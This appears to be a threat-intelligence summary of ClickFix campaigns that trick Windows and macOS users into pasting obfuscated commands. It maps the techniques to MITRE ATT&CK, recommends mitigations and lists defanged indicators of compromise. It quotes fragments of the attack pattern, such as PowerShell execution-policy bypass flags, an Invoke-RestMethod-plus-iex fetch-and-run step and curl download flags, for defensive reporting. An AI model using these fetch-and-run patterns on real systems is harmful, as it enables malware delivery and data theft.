ClickFix Campaigns Targeting Windows and macOS

Insikt Group tracked five ClickFix clusters that use fraudulent human‑verification lures to trick victims into copying and executing obfuscated commands in native tools like the Windows Run dialog and macOS Terminal. These campaigns leverage living‑off‑the‑land binaries and in‑memory execution to stage payloads such as NetSupport RAT and MacSync while operating via disposable, often Cloudflare‑protected infrastructure to maintain continuity. #ClickFix #NetSupportRAT

Keypoints

Insikt Group identified five distinct ClickFix clusters (e.g., Intuit QuickBooks, Booking.com, Birdeye, Dual‑Platform Selection, macOS Storage Cleaning) active since at least May 2024.
ClickFix social engineering manipulates users to run obfuscated commands manually (pastejacking or directed copy/paste) in trusted system utilities, shifting exploitation outside the browser.
The ClickFix execution framework follows a consistent four‑stage pattern: obfuscated input, native execution via LOLBins, remote ingress from threat actor infrastructure, and in‑memory execution.
Observed payloads include NetSupport RAT, MacSync (information stealer), Lumma Stealer, Vidar, and Odyssey Stealer, with persistence achieved via Startup shortcuts and randomized folder names.
Clusters show operational variance (lure themes, OS detection, disposable/domains behind Cloudflare) but reuse common command patterns and staging techniques, enabling a scalable “run and repeat” template.
Recommended mitigations include disabling the Windows Run dialog via GPO, enabling PowerShell Constrained Language Mode, enforcing AppLocker/WDAC, restricting macOS shell access via MDM, and operationalizing HTML Content Analysis and Recorded Future risk lists.

MITRE Techniques

[T1204 ] User Execution – Victims are socially manipulated to run commands in native tools (Run dialog, Terminal). Quote: ‘…lures victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.’
[T1059.001 ] PowerShell – Obfuscated PowerShell stagers executed with flags to bypass policy and logging (Invoke-RestMethod + iex). Quote: ‘…NoProfile and -ExecutionPolicy Bypass flags…’ and ‘…dynamically construct and invoke Invoke-RestMethod…’
[T1059.004 ] Unix Shell (bash/zsh) – macOS campaigns use multi-stage decoding and shell commands (xxd, Base64, curl) executed in Terminal. Quote: ‘…Hex -> Base64 -> ZSH’ and ‘…curl -kfsSL…’
[T1218 ] Signed Binary Proxy Execution (LOLBins) – Threat actors use legitimately signed utilities (for example 7z.exe) and other LOLBins to download and extract payloads. Quote: ‘…leveraged native, legitimately signed executables to download malicious payloads to a victim’s machine.’
[T1027 ] Obfuscated Files or Information – Commands and scripts are heavily encoded/fragmented (case randomization, substring building) to evade static detection. Quote: ‘…input of highly encoded or fragmented strings’ and ‘obfuscated PowerShell command…’
[T1140 ] Deobfuscate/Decode Files or Information – Multi-stage decoding (hex → Base64 → executable) is used on macOS to reveal final payload URLs/commands. Quote: ‘…the first example decodes a hexadecimal string to reveal a Base64‑encoded client URL…’
[T1071.001 ] Application Layer Protocol: Web Protocols (HTTP) – Malware initiates C2 and staging communications via HTTP(S) requests (HTTP GET to C2 domains). Quote: ‘…neservice.exe performs an HTTP GET request to gologpoint[.]com to initiate command‑and‑control (C2) communications.’

Indicators of Compromise

[Domains ] ClickFix landing, dropper, and staging domains – nobovcs[.]com, sign-in-op-token[.]com, and 40+ other disposable domains (examples: thestayreserve[.]com, checkpulses[.]com).
[IP Addresses ] C2 and hosting infrastructure – 62[.]164[.]177[.]230 (gologpoint[.]com), 152[.]89[.]244[.]70 (NetSupport RAT C2 and related domains).
[File Names ] Staging and payload files observed – at.7z, lnk.7z, 7z.exe, neservice.exe (NetSupport RAT binary).
[File Hashes ] SHA‑256 of staged artifacts – c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50 (at.7z from nobovcs[.]com), 397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 (at.7z from checkpulses[.]com), and 2 more hashes.